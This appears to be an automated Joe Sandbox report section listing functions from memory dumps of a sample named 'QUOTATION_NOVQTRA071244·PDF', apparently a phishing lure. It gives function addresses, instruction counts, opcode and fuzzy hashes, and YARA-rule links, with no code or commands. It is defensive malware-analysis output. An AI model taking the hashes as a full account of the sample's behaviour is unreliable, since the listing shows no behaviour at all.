Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34da1f08f1fc4fbb47ec7b792c69841ebebb051eaf5e72855abf5477bd0da2ea
Instruction ID: dca224a782fefd86b9d6374324a6a732ce925b68a6b5daf993465dc48c861a3a
Opcode Fuzzy Hash: 34da1f08f1fc4fbb47ec7b792c69841ebebb051eaf5e72855abf5477bd0da2ea
Instruction Fuzzy Hash: 0FA1E331C1D69A8FE74AEB6898651E97BB0FF22754F0802BBD048EB1D3DF286805C755

Function 00007FF848F43D3D Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60f6b76408651f419cbdfdcebfbd513beb4d3a47b02807dcc090447855292b25
Instruction ID: 3af6687cc0117a3fa3fe5aa2685c3b7f219b6ac4d02b67229403da611682291f
Opcode Fuzzy Hash: 60f6b76408651f419cbdfdcebfbd513beb4d3a47b02807dcc090447855292b25
Instruction Fuzzy Hash: 4281D330A18A5D8FDB94EF68C855BADB7B1FF58345F5000BAD00EE32A1DB34A980DB04

Function 00007FF848F41C4D Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c01885fd8852352567b6fc026b099761fb07acac67b9585948799ed1de958f94
Instruction ID: e348c994d609abc5c7a6ce40538976d39f2cd7ce7530dbd69183cfc147dca775
Opcode Fuzzy Hash: c01885fd8852352567b6fc026b099761fb07acac67b9585948799ed1de958f94
Instruction Fuzzy Hash: 1B612631D0CB998FE755EF6898462E97BE0FF55710F04427BD048D3292CB346889CB86

Function 00007FF848F40E9D Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f902c236293f274b5c0e22b2eb67df29b26e6160ce262bf7f59b0a2bbd6ae8b9
Instruction ID: bd9d27934ad73788fdcea43c85ef7f91fe5eef23b34f02f124abbffb27e8a952
Opcode Fuzzy Hash: f902c236293f274b5c0e22b2eb67df29b26e6160ce262bf7f59b0a2bbd6ae8b9
Instruction Fuzzy Hash: D3511431E0C9598FE795EB6C84447B87BE2FFD9BA0F1441BAD44DD7287CA299C428780

Function 00007FF848F4BBE0 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40cc0a53353d46ad55f6fe15e2dc23b66f1422f1539d4665b088c811528c1005
Instruction ID: 019398e8c201bc9dbb946f8b761e0c207a697a527c9584a9898c3ef0e244f5ed
Opcode Fuzzy Hash: 40cc0a53353d46ad55f6fe15e2dc23b66f1422f1539d4665b088c811528c1005
Instruction Fuzzy Hash: 20619232C1E6D69FE756EB6858A50E57BB0FF22758F0802F7C0889E0D3EF1968458359

Function 00007FF848F4BC00 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a72a98b6f5fe7b07e9de5937d696f835585b3d168be4584681421e0393b40ae
Instruction ID: 166689511bce5611f543d341c0d534e6dfebdb16968a452e341c59da46a18a6e
Opcode Fuzzy Hash: 9a72a98b6f5fe7b07e9de5937d696f835585b3d168be4584681421e0393b40ae
Instruction Fuzzy Hash: 4851B032C1E6D69FE756AB6858A50E57BB0EF22758F0802F7C0849F0D3EF1868098359

Function 00007FF848F4BC95 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e883f9292e745fd5f92ef032a15ee10771f8e9b8ef43c4b0914fe8e43f1902c7
Instruction ID: 1a323440ef096c447ec1b32d1f722a89951a65b8b75ea159f2c1770bc873e177
Opcode Fuzzy Hash: e883f9292e745fd5f92ef032a15ee10771f8e9b8ef43c4b0914fe8e43f1902c7
Instruction Fuzzy Hash: 3251A132C1DAD69FE35AAB6898A90E57BB0FF22B54F0801F7C4849B0D3EE1965068355

Function 00007FF848F40CA9 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6572e6f5983c4c339a463f799e421d9b3852b7829a80cddf49053a9cd7f3556c
Instruction ID: de0d15821a8f444352963f9fc603b4e6910b54379759ffedb4440956a183e95f
Opcode Fuzzy Hash: 6572e6f5983c4c339a463f799e421d9b3852b7829a80cddf49053a9cd7f3556c
Instruction Fuzzy Hash: E941F531A0CA094FEB98FB28980A6B977F1FFE5750F10417BD409D7187EE29A8428784

Function 00007FF848F41CFA Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81b1c6545a0f9a201141c021d685281ebdf2bf09a1ed438f665398f49cb54d0f
Instruction ID: 29898b7089d76e825e23a3fa17df0d71437b458c3350b05078a0dee33d60e422
Opcode Fuzzy Hash: 81b1c6545a0f9a201141c021d685281ebdf2bf09a1ed438f665398f49cb54d0f
Instruction Fuzzy Hash: 1C417D31918B1C8FDB58EF58D8466E9BBF1FB98310F00826BD44D97256DB34A885CBC2

Function 00007FF848F4A775 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67455a2851aa0f18d3dcb22ffbddd16f1507109c922916a5bd02135a37c93cb
Instruction ID: 2bbb3f49a03250f1bb62b41429b20ac264c7952319f0f9f8da3f0e56bcd1de61
Opcode Fuzzy Hash: f67455a2851aa0f18d3dcb22ffbddd16f1507109c922916a5bd02135a37c93cb
Instruction Fuzzy Hash: 8D41F676D0E64A9FE745FF5CE8925E933B0FF607ACF080277D008CA193EE2865468694

Function 00007FF848F44308 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9624e33fe506cc44df4a7f7a01f188bc8f82adba296446a317f7429c1d09b527
Instruction ID: 1a71325537db6212a6c91a69bfcfb5505c070508f9348bbf4ae867ac2b367944
Opcode Fuzzy Hash: 9624e33fe506cc44df4a7f7a01f188bc8f82adba296446a317f7429c1d09b527
Instruction Fuzzy Hash: 7F418F30A09A4D8FDB84EFA8C454AEDBBF1FF99340F10017AD409E7295DB34A986CB51

Function 00007FF848F44890 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeacb1ce8f0b7a2008d71fcdd7a30da34f8c95237a070ca17cf60c17ff0add74
Instruction ID: e3408bebb2dd85db7246bc05dd9adda03fc3d558d29da511d238de7b8d5077c4
Opcode Fuzzy Hash: aeacb1ce8f0b7a2008d71fcdd7a30da34f8c95237a070ca17cf60c17ff0add74
Instruction Fuzzy Hash: C941EF31A0C54E8FDB45EF68D4906FABBA1EF85394F5401BAC009E7281CB386985CB95

Function 00007FF849093109 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 492b4ea394c847c6d2890f07dd7769ca40bcda4670bccbdbb4e707d6dd4cdca2
Instruction ID: 51ce0e8d7fa473f0ca9e02cbc5e16ff07ac5696477ea3443b6a771d8e70e445d
Opcode Fuzzy Hash: 492b4ea394c847c6d2890f07dd7769ca40bcda4670bccbdbb4e707d6dd4cdca2
Instruction Fuzzy Hash: F7410870D0C55A8EEFB8EF5888457BDB7A1FF59398F104179D00DA21A5CB38A985CF90

Function 00007FF848F4AD5D Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da5295eb67721b1d45a24f8c5dec8a0b9a1b3f5053f65ba1e3676fd306c080a9
Instruction ID: 2f4f0f00fff132168f454a7e2b9bc317652d1c7324de5e606b2839a977ce910b
Opcode Fuzzy Hash: da5295eb67721b1d45a24f8c5dec8a0b9a1b3f5053f65ba1e3676fd306c080a9
Instruction Fuzzy Hash: CA31F83290D6999FDB46EF2CD8565D97BB0FF12319F0802B3D04CCA0A3DB28A495C795

Function 00007FF84909332F Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8e6400eebaf53c8ab7fab181955cd15b3f925098e0da5bae128f3c528c500aa
Instruction ID: 283692521be11e12bd7675fa922d06dc861ceb917cee90bc5f80008cf4a2f44a
Opcode Fuzzy Hash: e8e6400eebaf53c8ab7fab181955cd15b3f925098e0da5bae128f3c528c500aa
Instruction Fuzzy Hash: AE31FD70E0895E9FEFA4EF58C4456ADB7B1FF58754F104179D009E3295DB38A8828F90

Function 00007FF848F44850 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4645ba79407df2eeaedb85465232e218018880e67aa5f446e9c199e4ad59370a
Instruction ID: e8a35e94df61671c4e1ffb4931519c98cbdad60ebdb5910b9c98426eb58485cc
Opcode Fuzzy Hash: 4645ba79407df2eeaedb85465232e218018880e67aa5f446e9c199e4ad59370a
Instruction Fuzzy Hash: 3E312632A0E55E9EE744BB68A4511FA7BA0FF413A8F080277D00CDA183CF2C5845C7A9

Function 00007FF849093C0B Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c10aa9e4b5097f1cf8de7e06df1d1752a9acf68040963dd554fb7c0d2c8b5d23
Instruction ID: 2f9d8996131f9444f0fc22f2673fe27234bbf85923ddbfdb00d444aaae59b2f6
Opcode Fuzzy Hash: c10aa9e4b5097f1cf8de7e06df1d1752a9acf68040963dd554fb7c0d2c8b5d23
Instruction Fuzzy Hash: 21319330E0891D8FDBA4EFA8D455AADB7B1FF98395F50017AD00DE3291CB35A886CB50

Function 00007FF848F4F74F Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc368efed0445f656ced4aff3407999f76dd202a8b895c82048b792a085b81b
Instruction ID: b190de1df6136c04883f1fad26332017d0319cfd2c994682023d132b0a663042
Opcode Fuzzy Hash: bdc368efed0445f656ced4aff3407999f76dd202a8b895c82048b792a085b81b
Instruction Fuzzy Hash: 5141B77190991D8FDBA8EF14C854AE9B7F1FB64301F1041EE804EE32A0CE71AA81CF81

Function 00007FF849093D66 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74e8cb9ee0041dfb7e167fa635e8ada71ebfeae3fa589680f983a415e3e4ac6
Instruction ID: 133ca109075cddd26fc28e1d166270c46ac687eafc260438c234ad88e0c9c33c
Opcode Fuzzy Hash: c74e8cb9ee0041dfb7e167fa635e8ada71ebfeae3fa589680f983a415e3e4ac6
Instruction Fuzzy Hash: D031C430E0892D8EEBA4EF68D4557ACB3B1FB98391F5001BAD00DE2291CB34A9858F50

Function 00007FF848F40AEC Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2750577f829f0498cf27b2086c2ebc8db2cd7c2ae3651c2406c401b153126a8d
Instruction ID: d4005e21a96374b9c080be5a2613fff3aef68bd63e29c68d12c5df60d05e35c9
Opcode Fuzzy Hash: 2750577f829f0498cf27b2086c2ebc8db2cd7c2ae3651c2406c401b153126a8d
Instruction Fuzzy Hash: 8A21FB3590CA4E8FDB85FF24C8446EA7BB1FF95300F1041ABD809D7295DB74A946CB85

Function 00007FF848F40B19 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204ec5e0a9dbd4e958f44e16ec684ea676cd5bf9cda5aa11d59c4d78a3a86d83
Instruction ID: 86de6ba9b887a4cac749b685dd1741ff2cc1ac35ab6222bd1216adfebebd0a94
Opcode Fuzzy Hash: 204ec5e0a9dbd4e958f44e16ec684ea676cd5bf9cda5aa11d59c4d78a3a86d83
Instruction Fuzzy Hash: 4D210A3090C68E8FDB85EF24C8446EA7FF1FF95300F1441AAD809D7296CB789586CB45

Function 00007FF848F40A41 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6967b47b1094d0d27905cf7184c8b6c896e9a5bbb579b5a2119775a338abe6f3
Instruction ID: ea594e56829b293307800b89c230b2c50430138d97bc5914e609915b105b30c9
Opcode Fuzzy Hash: 6967b47b1094d0d27905cf7184c8b6c896e9a5bbb579b5a2119775a338abe6f3
Instruction Fuzzy Hash: C821C232D0C99E4EF7E0B72498152BA76D0EFE5794F0401BBD81CE30C3EF6869198689

Function 00007FF849093B9C Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9724b179cdcce45067571382a588691e81ea73f919fa37abf955c4d09b1ec2b
Instruction ID: ff04333f7cdf0d76aff6e05364cc01f9a2de2f9d21cb7eeef3a43d8937093c52
Opcode Fuzzy Hash: f9724b179cdcce45067571382a588691e81ea73f919fa37abf955c4d09b1ec2b
Instruction Fuzzy Hash: B121D831E0855D8FDB68EF98D495AEDB7B1FF98391F50017AD009A2281CB3469868B90

Function 00007FF849093545 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d56a0be5cea2d866ba916df319ea2e5a4a5fbb2ff1550f73ee3bb09ee130f99
Instruction ID: 35371c26b14880fad6f9ca4ca1ac94b8b2370e76055fec0837ec25c5b6256f84
Opcode Fuzzy Hash: 6d56a0be5cea2d866ba916df319ea2e5a4a5fbb2ff1550f73ee3bb09ee130f99
Instruction Fuzzy Hash: 63212870E0895E8FEFA4EF58C8457A9B7B1FB68354F5041B6C00CE3290DB38A9858B90

Function 00007FF848F40810 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 599befd6d2d84c648dd6567fe2861d4b35175e9fa272c060df5de13a3e34e4c8
Instruction ID: d5d5ef39a056e3d2be91d9ef0f8b76e7dd134e24dc2ffeadf9846f221f317626
Opcode Fuzzy Hash: 599befd6d2d84c648dd6567fe2861d4b35175e9fa272c060df5de13a3e34e4c8
Instruction Fuzzy Hash: BF21D132C1E6C14FF6D9733829151752EE0AFE2F90F2840FBC498970E79A185C4987DA

Function 00007FF848F40A17 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d78ece4326ba709dd51a3f78a75faa01e91a5509215d1357687b7893ae4a9c23
Instruction ID: 509698e1ad0d40d8930f041cb8c618a73c063684da27228c9d7112f97411d191
Opcode Fuzzy Hash: d78ece4326ba709dd51a3f78a75faa01e91a5509215d1357687b7893ae4a9c23
Instruction Fuzzy Hash: 89116D32D1C85A0DF6F4B72898152B971D1EFE4B94F440177DC1DE35C3EF68291A4A89

Function 00007FF848F448A0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e48e647eac81fb812756e88d12da0b5c4b97ce6ac69922f7d1c18f8ee46bd4
Instruction ID: d0a1f83f5b85aad783c8bfca250cd86da85eea7db6d7970e2178b24b505a1753
Opcode Fuzzy Hash: c3e48e647eac81fb812756e88d12da0b5c4b97ce6ac69922f7d1c18f8ee46bd4
Instruction Fuzzy Hash: 2C11AC71A0D64E9EEB44EF6894502FA7BA1EF59394F44017AD409E6281CB3868808BA9

Function 00007FF848F4B507 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4868e34b5cf47752d29b3390d20786cab4cb80eb7ffac623de4e457821a65dc5
Instruction ID: 5d1e52e59979012b3a34b20a3d8e24ac086b0df109c33cb15f12555cbb9ee5ad
Opcode Fuzzy Hash: 4868e34b5cf47752d29b3390d20786cab4cb80eb7ffac623de4e457821a65dc5
Instruction Fuzzy Hash: D711B23181964D9FDB44FF18E885AE97BE0FF59348F0402A6E44DCA192DB38A544CB45

Function 00007FF848F4ABF2 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22185de9061dc86f6adee603b8704ac580462921044e0ab5cbe579e238481850
Instruction ID: f2a2b8df91e13f100eea7634b1c0e6883e84a677e26ff602088437cad7e02ecd
Opcode Fuzzy Hash: 22185de9061dc86f6adee603b8704ac580462921044e0ab5cbe579e238481850
Instruction Fuzzy Hash: 43119A31908A1E8FEB84EF18D895AFAB7E0FF64305F040266E408D6192DB35E944CB90

Function 00007FF849093650 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7218ebb2e06c38380d633e6f56f64f6e8aa2a4c63eae1e899f812385a87edd
Instruction ID: 6c476560d4e0c3b051b3eeb91efbd043d298321f75e5c63fa20c8f5bd86f6cd6
Opcode Fuzzy Hash: 6c7218ebb2e06c38380d633e6f56f64f6e8aa2a4c63eae1e899f812385a87edd
Instruction Fuzzy Hash: 06110670E0895A8FEFA4EF5888457AAB7B1FB58794F5041B5C00DE3290CB38A9858F90

Function 00007FF848F49FDD Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78029a11f6ccb1a3da9f8a671daca7001274da7b61b52c989dfab9e6e5c2553d
Instruction ID: b5b86d0ef9ab8837e47fae04c3ccd8830f5e3dfb3275ffd0ded7fd8d60bff663
Opcode Fuzzy Hash: 78029a11f6ccb1a3da9f8a671daca7001274da7b61b52c989dfab9e6e5c2553d
Instruction Fuzzy Hash: 71115830919A4D9FDF84EF6CD859AEA7BF0FF28305F040666E408D72A1DB34A484CB80

Function 00007FF84909314D Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655449534.00007FF849090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849090000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f51aa56a6770e8b8f63c2d31d82a39b51755cfd6649716813e11ca33304881a
Instruction ID: aa31222c86410ecf7331b93063e2cf81a330b5330ff78b117f9123b40d2e8b9d
Opcode Fuzzy Hash: 1f51aa56a6770e8b8f63c2d31d82a39b51755cfd6649716813e11ca33304881a
Instruction Fuzzy Hash: 59010970E0855A8EEFA4EF9888457ADB7B1FF58354F504175C00DE2290CB3868858F90

Function 00007FF848F44105 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b887c822227d78e0593816450bf6ad20d9cb5b7360128dbf6f3e942f1e9695d
Instruction ID: a0fe1acbef157532e5b0d9868374e3ce538bb004738ff987f3a374fff3af5a54
Opcode Fuzzy Hash: 2b887c822227d78e0593816450bf6ad20d9cb5b7360128dbf6f3e942f1e9695d
Instruction Fuzzy Hash: CBF03A30919A0D9FEB41FF58D4496EDBBE0FF68345F100577E80DE2191DB34A6908B85

Function 00007FF848F44128 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f647b2f28fa5ffebd39766a2ff78d4aac0e5c5340e3feb196ebd26cf9a913a98
Instruction ID: e03654b3233e133fb60aef886a40a5b7b3ca168ec224eb16adfb6901a25477fb
Opcode Fuzzy Hash: f647b2f28fa5ffebd39766a2ff78d4aac0e5c5340e3feb196ebd26cf9a913a98
Instruction Fuzzy Hash: CFF01C30918A4D9FEB84EF68D8496EABBE0FF28345F004576E80CD2191DB34A690CB85

Function 00007FF848F4D2C0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 988b411fea26a09e8a52b9f269060917f73331543c722fbe9d0ee0588282d023
Instruction ID: 5980581aa2e3cd86cbec9390eb576e65cded174bf082748e9677339566d8d862
